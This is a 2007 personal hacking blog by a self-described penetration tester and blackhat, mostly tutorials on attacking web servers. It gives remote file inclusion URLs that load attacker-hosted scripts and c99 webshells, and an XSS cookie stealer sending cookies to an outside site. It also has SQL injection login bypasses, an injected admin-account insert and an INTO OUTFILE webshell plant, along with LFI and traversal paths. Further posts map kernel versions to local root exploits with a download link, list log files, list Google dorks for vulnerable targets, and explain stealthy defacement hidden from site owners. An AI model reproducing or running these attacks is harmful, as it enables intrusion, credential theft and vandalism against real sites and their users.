what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Wednesday, November 07, 2007

SOME BASIC REMOTE FILE INCLUSION

This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.

In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:


$file =$_GET['page']; //The page we wish to display
include($file);
?>



If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.

www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?

So the vulnerable server will try to execute:


$file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page'];
include($file); //$file is the attackers script
?>



So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.

This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack, how to bypass restrictions and other ways like backconnecting and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates, jump in and scroll in the server

Peace to all,

All the best

/Chuks

Tuesday, November 06, 2007

REMOTE CODE EXECUTION



This is where the intruder uses a vulnerability on your scripts to attack a webserver and executes arbitary commands. We can have a few snapshots of how it can be done. Check here.



Note that this is a very old bug and alot of servers are already patched against them but u will find a number of servers and sites still vulnerable to this.

Remote Code Execution also leads to others attacks, Like Local File Inclusions, Remote File Inclusions due to a method we call Gratuitous File Uploads.

Good week,

/Chuks

Tuesday, September 25, 2007

SOME LIST OF KERNEL LOCAL EXPLOITS

This is really useful. Tells you which exploits are suited to which kernels

2.4.17
newlocal
kmod


2.4.18
brk
brk2
newlocal
kmod
km.2


2.4.19
brk
brk2
newlocal
kmod
km.2


2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2


2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod


2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod


2.4.22-10
loginx
./loginx


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.25-1
uselib24


2.4.27
Uselib24


2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit


2.6.2
mremap_pte
krad
h00lyshit


2.6.5 to 2.6.10
krad
krad2
h00lyshit


2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit


2.6.9-34
r00t
h00lyshit


2.6.13-17
prctl
h00lyshit

-------------------

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl


compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/

Monday, September 17, 2007

PLAYING WITH SOME PHPMYADMIN

Guys at nnc made more of knew progress on phymyadmin hacking. And these are their papers.

Paper:
http://nnc.unkn0wn.eu/papers/pma/phpmyadmin.txt

Sql1:
http://nnc.unkn0wn.eu/papers/pma/sql1.txt

Sql2:
http://nnc.unkn0wn.eu/papers/pma/sql2.txt



Secure your applications.


/Chuks

Friday, August 03, 2007

Log Locations

Alot of guys asked me where most of the logs are kept, well the display photo on the left show logs of /var/log/secure

Well, i will update later with Windows version.
For now have this.








IRIX:
=================

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:
=================

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:
=================

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:
=================

/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logut
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth


/Chuks

Monday, July 16, 2007

Script kiddy tutorial

1. You goto milw0rm, neworder, bugtrak (and so one) and you find the latest exploit for some deamon that you know the name off, (then u would guess it must be very common).

2. You install the daemon locally, the vulnerable version and test the exploit locally, probably it's try, a hoax!!!& u'll have to reinstall your PC a dozen times before you post the code and get laughed at with the "rm -rf /" in the code.

3. You come and cry and stomp your feet in every forum on the network saying "how do i compile", after a month of so, you got yourself a .out (wtf is that???)

4. Repeat step 3 with asking what is a .out

5. Woho Your leet, time to prove it, goto step 6

6. With your locally installed vulnerable daemon and exploit ready to go, you check out the banner of the daemon, and write it down

7. You make yourself a little script that nmap a certain the port that deamon runs on and try to match the banner of the vulnerable one.

8. Find an ip range of dedicated servers, cheap ones are the best, like some dedibx because there are thousand of people that just buy them and don't do anythnig with time or update them as they have no value.

9. Scan them all NIGHT ...

10. Wake up and run your leet download and compile the exploit.


11. Get banned from all Forums, and look like a total retard.




TO BE CONTINUED...........



/Chuks

Saturday, July 14, 2007

TURNING 26 TODAY

Hi,

Well, i'm going to be 26 today, and i just had the best fooling ever from my friends. First they DOSed my server in the morning, then they made a stupid account in one of the forums i constantly browse and a senior member also, with a name chuksjonia-junior. Then everybody said its my kid turned hacker and he is selling hacked paypals, Lol! And ain't a father yet.

And this is the best text i got today from a friend who got my number:

Birth is a "START OF LIFE" beauty is a "ART OF LIFE" love is a "PART OF LIFE" Death is a "LAST OF LIFE" But friendship is a "HEART OF LIFE" happy birthday 2 Chuks.


Thanx for the support over the years guys. All the best this Saturday, bye.


/Chuks

Monday, July 02, 2007

THE XXS SCANNER DOWNLOAD

Hi,

U can download the script here, if u didn't find it:

http://41.206.42.174/chuksjonia/tools/xxs.py

Its written in Python, so just compile it.


/Chuks

Saturday, June 30, 2007

DEFACING SITES [Methods]


Method 1 - Content replacement.

Using the existing server host, web server etc, replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and replace original ones.

Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.

Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.

Method 4- Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.

For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.

Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.

Method 6 - DNS hijacking.
compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.

Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).

Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced

Method 9 - ISP compromise.
Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.

Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.

A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.

All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.

Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.

Be Protected Methods.

Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.

Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep

Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.

Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them)


/Chuks

Credits to my fellow friend, MuRd3rp0L!c3

Friday, June 22, 2007

AN ATTACK WITH CROSS SITE SCRIPTING

CROSS SITE SCRIPTING ATTACKS


Well, this is a simple example of an XSS vulnerable site. Its displays my cookie when i initiate document.cookie. If u know what i mean by cookies, then u will understand that, u can edit cookies too. Lets explain more on this below. Note, no beef with the site owners, just an example.

For some months i have been studing more on Cross Site Script (XSS) and i think i need to post this. I posted a zero day XSS scanner some time last week, if u didn't get a glimpse of it, i can always do that later.


ABOUT THE SCANNER


-Well that scanner, should get y
ou going when looking for Targets u wonna work out this weekend. Using Google Queries
is always the best way to hack with, we always say google is the best teacher, and the best hack tool ever exposed to the public, that is more than 60% accurate.

I'm not the author of code, its done by a good friend, i spend time with google, so i dont need a code to pick XSS vulnerable sites.

Anyway for starters, its good to know how to use tools before u get all blackhat and start picking targets with google or mouse pointer
s, hehehe.......... I'm Blackhat, i do alot underground stuff, read the manifesto, but they will never get near me, since i leave no trace.

THE SCANNING PHOTOS

Lemmie upload some photos of what the scanners can do.












So we are going to discuss the following

a)
Cookie Stealing
b) Javascript Injection
c) Xss in general and how to apply the attack

What Is a Cookie?

A cookie is a sensitive piece of data. You see once you go to a site and sign up a cookie is set to remember you. A cookie just holds data that the site can check that you have and see if youve been there before, if you have then it checks to see if the user and password are correct then logs you in. Picture your at a night club and you buy a ticket and they give you a band. So you can go in and out (so you dont have to rebuy a tickey) Cookies go much farther then that as you can see. Night Clubs remember you for one night. Cookies can remember you for ever.

Alerting & Spoofing

So you know what a cookie is... now how to you see them? Actually cookie editing is one of the most simple method. You see as long as you have a browser you can view and edit cookies, just with basic JavaScript(JS) skills. Load up your browser and go to the site... login... nowtype javascript:alert(document.cookie) and you should see a user and password (which is yours) If you don't thats ok! Most sites now a days don't use cookies... but use sessions... Sorry sessions can't be edited (they can) but not like cookies, once you edit a cookie you can spoof yourself (username and password) Now let's begin to spoof... Ok say you alerted the cookie and saw something like this...

strusername=Chuks;strpassword=danger

Now say you know 'kenya' is a admin and you don't know his password... due to weak security you don't need a password javascript:void(document.cookie="strusername=kenya") Now type javascript:alert(document.cookie) !!! Heh welcome kenya That's pretty much all to Cookie Editing. Do more research on that, i aint doing it for u.

What Is XSS?

XSS, or CSS, whatever you perfer to call it, XSS (CSS) stands for Cross Site Scripting. Basically that means you inject script any kind, to make it do whatever you want... Depends what you inject will depend on the outcome. With XSS you can also steal input. Such as user names passwords and cookies. This will all be discussed so will many examples and this article should help you get creative with XSS.

With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You setup XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. Xss can also steal cookies. Cookies hold valuable Information such as user / passwords etc...

So there was this question, the file output that the stealer script picks and pastes at the evil server with the cookies, could there be a google dork, that can help search for these outputs? Good Question, right? Hehehehe..............



Cross site scripting seems to be the future of web attack and new techniques develop every day. Good read. Will edit more later, since this was written in a Hurry and i havent explained more on the attack too, so hold on, atleast i did an Introduction.

/Chuks






Tuesday, June 12, 2007

THE MOST USED METHODS TO PENETRATE A WEBSERVER.


* This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;
* This document was prepared for informational purposes only;
* This document can not be multiplied without the authors permission.

Respects to my friend, flow-flow, for the German paper on the same.


Hackers Manifesto
I am here to exploit, to learn how thinks work.I’ve always put questions and I have always seeked for more than two hours.My crime is one of coriousity, I exploit what you dream of I am over ambition and will. If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.
I’m in the underground for 5 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinite possibilities that it opens for a man.
You don’t know me ,so don’t judge me ! ONLY GOD can judge me !
If you feel something reading these lines, that means that I am talking to you, if not look away.
We have to help each other, hacking can not be defind ,hacking is a state of mind.
I thank all of you that helped and help me !
This is my manifesto !

The tutorial will be structured in two directions : vulnerabilities and fixing them.

A lot of people are making tutorials but they just talk , i am going to really explain a few methods as we go. I don’t consider myself a specialist but i know what i am talking about.

SQL-INJECTION

Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain access to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.
Building programes with SQL to manipulate the commands from the data base and so getting access.The most used is SQL login bypass,through which we inject in the login and password fields.

Example ‘ OR 1=1—
URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—
Other comands : admin’—
‘ OR 0=0—
“ OR=0—
OR 0=0—
‘ HI OR 1=1—
" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

We look for vulnerable sites with the following google-dorks :
”admin\login.asp”
”login.asp

How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.
At each change of the components it must be done a web security audit.
It has no sense for me to get in any more detailes. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.

SQL Injection table modification

Here’s what we are going to do.
We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.

At the username : ‘ HAVING 1=1
The error must contain a table name : user_member.id .
Then the injecting of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try :
‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--

Now if everything went well we shold be able to log in with :
-user : hacker
-password : hacked

REMOTE FILE INCLUSION

In this method what we actually what to do is upload a file ,a shell emulator on the web page, the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme, we will upload the emulator,getting access to the entire server.
This method is much more than this ,this is only a form of it so read further more and more tutorials.
Here is a couple of google-dorks to find vulnerable web sites :
: inurl :”index.php?page=”
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=

We test on : http://site.com/director_vulnerabil.php?=http://google.com ,if the page opens in google in the site frame then it is vulnerable.

LOCAL FILE INCLUSION

A code problem can have serious consequencies ,this method is similarily to CGI Exploitation. Lets say i have access the password folder from the UNIX server. Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! then great hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem ,the code that generates it and so on.
Here is an example of an error :


$page input is not satinized.



The content is crypted ,but you can try with the bruteforce method using a program such as Brutus, will publish a perl code soon.I searched for passwords of FTP accounts for instance.It depends on your luck to.

URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd

REMOTE ADMIN FILE DISCLOSURE

You try this more ‘blind’ in general because we don’t know for sure if it will work every time.
Remote Admin Password Disclosure,we try to acces folders from the inside.


URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted alot of examples on other sites where I have found some serious info like passwords and so on. Here it isn’t such a big deal.

CROSS SITE SCRIPTING

It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to really understand.
More exactly I’m going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : .The result is a alert window with the text “xss”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.
After we test it like so : script>alert(‘XSS’) we do the following:
window.location=’http://site.com/carie.php?cookie=’+’document.cookie;

NULL BYTE-CGI EXPLOITATION

CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :
Index.cgi?pageid=2
Here page2.html is shown but if we modify a little like so :
Index.cgi?pageid.cgi%00
We just added NULL byte and it comes to the end all the data in the URL. Now we do the following scheme :
Index.cgi?pageid=/etc/passwd%00

Almost seems like LFI.


DIRECTORY TRANSVERSAL

Directory Transversal is an HTTP exploit and it allows the attacker to access folders from the inside the server and to execute commands from the server’s root.

· Access Control Lists (ACLs)
· Root directory
These are two security protocols used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. Root directory stops users to access files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value
=../../../../../Windows/system.ini .
../ represents the director we go one folder up.
Another scheme would be : http:/site.com/scripts/..%5c../Windows/System32/


Hope this helps all of you, its an easy into to Web Application Security.

See u soon,

/Chuks









Thursday, June 07, 2007

PHOTOS FOR THE CEH, FIVE MODULE TRAINING

Well, i had promised i will upload the videos for the conference done a little while, but, i will have to postpone that to next week. Today i will upload the some photos for the classes, i trained on CEH. Well, none of the photos i am displayed, so dont look for me, hehehehe.......


1.One of the students tries to get a glimpse of what is going on when a shell pops up.


2.Some of the students who attended.

That all for now,

Cheers



/Chuks

Wednesday, June 06, 2007

CHUKSFIRE SQL INJECTION TOOL

I have been busy scripting a tool that can crawl servers looking for Vulnerable pages which can be exploited using sql-injection. Its written in perl, called chuksfire. I will be lauching it soon, i will not name the day. I'm still working on the code, but its at its BETA stage at the moment. Been busy training, thats why its not out yet. I will try probe wananchi.co.ke, i will not display the vulnerable lines, though, but one thing u need to know, sql injection, can get your network compromised. This is how it works:

Starting chuksfire scan...

[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26
[*] Checking robots.txt...
[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...
[*] Checking index.php...
[*] Checking for possible bugs...



I will try see if, i can add up some CMS bugs in the code, so as to pick known sql-injection vulnerabilities, on well used CMSs, like Joomla, XOOPS and others.

Good reading.

/Chuks

HACKERS CODE

The Code

  1. Hackers share and are willing to teach their knowledge
  2. Hackers are skilled. Many are self-taught, or learn by interacting with other hackers.
  3. Hackers seek knowledge. This knowledge may come from unauthorized or unusual sources, and is often hidden.
  4. Hackers are tinkerers. They like to understand how things work, and want to make their own improvements or modifications.
  5. Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with.
  6. Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another.
  7. Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.
  8. This Code is not to prescribe how hackers act. Instead, it is to help us to recognize our own diversity and identify.
  9. Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals.
  10. Hackers' motivations are their own, and there is no reason for all hackers to agree.
  11. Hackers have a shared identify, however, and many shared interests.
  12. By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.

See u soon in Hack Dejavu, this Saturday for VIP at my security forum/mailist, the same spot, Igundas Place.

Good day.

/Chuks

Saturday, June 02, 2007

THE IT SECURITY CONFRENCE ARRANGED BY FUTURISTIC

Hi.

As most of u already know, we had the first, IT security Confrence in Kenya at Mid last month. Though we didnt cover much as expected, but hope we did a good show, and people got introduced to I.T. Security and got learn how to use a small holes to compromise the whole Server or Host.

I'm sure most of u got amazed when i used a tool like metasploit and got hold the desktop of someone who is logged in. Actually, hacking with metasploit and seizing up desktops, is not so leet, mostly there are more complicated hacking styles, where u install a good connect back and no one will know u are connected or logged in. By that we use Backdoors or Rootkits. I demostrated how to use Remote File Inclusion and how to find it, in vulnerable sites, and thats where jaws dropped since you could browse the system files for the victim. "Are we already in someones Server" u would ask.

Anyway hope to meet you for the upcoming CEH full course, which i will personnally train, and we will go through the 22 modules.

Hope to see u soon, i will post up at my forum.

Good Read.

/Chuks

Tuesday, May 15, 2007

SQL COMMANDS, ALSO USED FOR COMPROMISE

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions too
On theirr own they wont exploit anything but eventually you will find an exploit that needs these and they are good to know, for injection or just to better understand how SQL works.

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


/Chuks

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE

These are on the comments and previews done, so i will try explain the way i can best about it.

They best way to defend it is to have port 3306 filtered.....(check that server, top goverment but one of the most insecure) mail me if u need the ip.

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


.........and have the latest Kernel patch in your Box. Aslong as an RFI bug may be in yah site, or lets say your CMS, a knowledgable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on Port 80. The only thing that really helped last year from these kind of attacks was to have yah php safe_mode ON (secure) but these days there are so many ways of bypassing it, Lol!

This was well shown after the month of PHP bugs, January and Feb this year after the release of alot of POCs to the public by Hardened PHP and other communities.

To all, the best way to secure yah BOX, is to know how an intruder will get thru, by doing all types of Pentest Attacks, whether Black Box or White Box penetration testing.

Something else, before i go, SQL INJECTION, can help an attacker to build up an RFI attack on a server, by tring an injection where he is able to browse files: load_file('etc/password') and create his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file in the server named vul.php, which will have a straight rfi bug.

So remote include with a c99shell,or c100, r57 and other privated moded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that needs alot experience.

Tried to explain in Example.

/Chuks

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into alot of attacks, especially the shopadmin, on the login pages and other sites using different CMS and running ASP.NET, and i have seen that most of the sites especially hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this articles, i will share with you some logins attemps, an attacker will use, try with and gain administration.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a


Username : admin
Password : admin' or a=a --

user='' or ''=''
